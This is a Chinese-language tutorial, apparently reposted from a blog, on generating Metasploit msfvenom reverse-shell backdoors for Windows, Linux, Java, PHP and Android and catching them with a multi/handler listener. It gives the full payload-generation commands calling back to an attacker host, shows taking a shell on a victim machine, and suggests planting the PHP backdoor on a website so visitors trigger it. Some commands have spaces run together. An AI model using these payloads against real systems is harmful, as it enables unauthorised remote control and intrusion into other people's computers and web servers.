MSF-Shellcode生成和使用

简介:

1      使用环境

Kali 2.0

msfvenom

2      Msfvenom参数说明

msfvenom –h    查看帮助

说明:

Options:

     -p, --payload     <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定

     -l, --list       [module_type]   列出指定模块的所有可用资源模块类型包括: payloads, encoders, nops, all

     -n, --nopsled     <length>        payload预先指定一个NOP滑动长度

     -f, --format      <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)

     -a, --arch        <architecture>  指定payload的目标架构

         --platform    <platform>      指定payload的目标平台

     -s, --space       <length>        设定有效攻击荷载的最大长度

     -b, --bad-chars   <list>          设定规避字符集,比如: &#039;\x00\xff&#039;

     -i, --iterations <count>          指定payload的编码次数

     -c, --add-code    <path>          指定一个附加的win32 shellcode文件

     -x, --template    <path>          指定一个自定义的可执行文件作为模板

     -k, --keep                        保护模板程序的动作,注入的payload作为一个新的进程运行

         --payload-options            列举payload的标准选项

     -o, --out   <path>               保存payload

     -v, --var-name <name>             指定一个自定义的变量,以确定输出格式

         --shellest                   最小化生成payload

     -h, --help                        查看帮助选项

         --help-formats               查看msf支持的输出格式列表

 

2.1  命常用帮助命令

msfvenom --help-formats     查看有哪些格式输出

wKioL1hI3gjjOgNAAAKV6ft_ZBg812.png

 

msfvenom -l encoders       查看有哪些编码方式

3      Metasploit生成多种后门

Metasploit可以生成各种格式的后门,有phpexewindows下后门)、linux环境下后门,java后门、androiw后门等等。

可以生成aspaspxphpjspwarexe等多种类型

 

现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayloadmsfencode

 

 

3.1  生成window下后门程序

使用以下模块生成windows系统下后门程序。

windows/meterpreter/reverse_tcp

 

生成木马程序时如果可以指定也可以不指定--arch x86 --platform windows,不指定则会报错提示,不用理会,-p后写指定的payload-f后指定文件格式。

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe

wKiom1hI3gjCzLlRAAEhv5HcAtg646.png

或者指定参数如下:

使用生成木马命令:

msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe

wKiom1hI3grgcyihAAGOFKMRwpw668.png

 

被中木马的机器IP地址是192.168.1.123

把在kali的根目录生产的木马程序aaa.exe文件拷贝到被攻击的机器上面去192.168.1.123上。

wKioL1hI3grxmHt_AAAwG5Oy2vg956.png

 

======================================================

设置监听:

使用监听模块:use exploit/multi/handler

wKiom1hI3omS5xzOAAM1eEthijI757.png


使用payload

wKioL1hI3orBrXS8AAC0_eD-OpQ566.png

 

wKioL1hI3vSiuE59AAaTqxI1GbM981.png

wKioL1hI3vXSBlhrAADfgOhiA8c563.png

wKiom1hI3vmR-ASJAAWCwoV2iA4762.png

执行监听

wKioL1hI3vqiYBb_AAEdIp1abUM618.png

 

=================================================

 

在被攻击的机器上面双机运行aaa.exe木马,此时在kali上面观看结果如下:

说明192.168.1.123已经被中木马了,可以控制此机器了。

wKiom1hI312AsSEiAALBjjKRbWg696.png

 

通过输入shell来进入控制台控制机器。

wKioL1hI316C0BdaAAF7T_kB1T8718.png

 

查看机器的ip地址是否是192.168.1.123

wKiom1hI32Dg0ZWWAAMjAOpZyzo807.png

3.2  生成linux下后门程序

使用以下模块生成linux后门程序,操作方法跟windows后门使用一样。

linux/x86/shell_reverse_tcp

 

windows系统唯一的区别是在linux下生成的木马需要给这个程序可执行的权限,通过使用以下命令chmod

Chmod +x 程序名

 

linux下执行木马程序命令:

./程序名

3.3  生成Java后门程序

Java程序在windows下和在linux下都可以生效执行的

 

使用以下模块生成后门程序:

java/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar

wKioL1hI36GC_UTJAACer3BdfFw366.png


3.4  生成PHP后门程序

使用模块:

php/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php

wKiom1hI36LitgJEAAIZIEum3Ag514.png

 

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

3.5  生成Android后门程序

使用模块:

android/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk

wKioL1hI382wVcoCAAJWs0jEjm4508.png

 



本文转自 老鹰a  51CTO博客,原文链接:http://blog.51cto.com/laoyinga/1880673

相关文章
|
12月前
|
开发工具
编译mimikatz
编译mimikatz
46 0
|
安全 Shell 网络安全
MSF框架讲解
MSF框架讲解
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(一)
Cobaltstrike4.0 —— shellcode分析
373 0
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(三)
Cobaltstrike4.0 —— shellcode分析
339 0
|
存储 算法 安全
Cobaltstrike4.0 —— shellcode分析(二)
Cobaltstrike4.0 —— shellcode分析
275 0
|
Web App开发 Shell Windows
在msf和powershell中利用hotpotato进行提权
本文讲的是在msf和powershell中利用hotpotato进行提权,通过类似SMB协议的NTLM认证已经被微软修补了,不过HTTP到SMB正在使用这种验证,并且还用于创建高权限服务中。因为流量包中含有NTLM凭据并且正在通过伪代理服务器,因此可以将其捕获并传递到本地SMB侦听器,作为SYSTEM权限执行任何命令。
2507 0
|
安全 网络协议 Unix
MSF2
Armitage工具的界面很简洁,左上角是Metasploit提供的一些进行渗透的模块,右上角显示的是扫描到的目标主机,下面是一个Metasploit控制终端,前面提到过Armitage可以挂载多个Metasploit控制终端,所以这里可以开启多个Metasploit控制终端。事实上使用Armitage跟直接使用Metasploit控制终端的差别不大,区别是在Armitage中可以从图形界面上选择用于渗透的模块,而控制终端需要通过命令显示并选择渗透模块。
|
网络协议 安全 关系型数据库
MSF7
在 Metasploitable 靶机上运行后门程序“ shell_zbj. elf ”,该程序运行起来后会连接Kali虚拟机
|
安全 网络协议 Unix
MSF8
Samba是一个用来让UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做链接的自由软件。在Samba 3.0系列版本上存在一个用户模拟漏洞,攻击者利用此漏洞可模拟任意用户,执行未授权的操作。
|
Web App开发 安全 JavaScript
MSF6
目前msfvenom工具已经取代了metasploit-framework旗下的msfpayload(载荷生成器)和msfencoder(编码器)。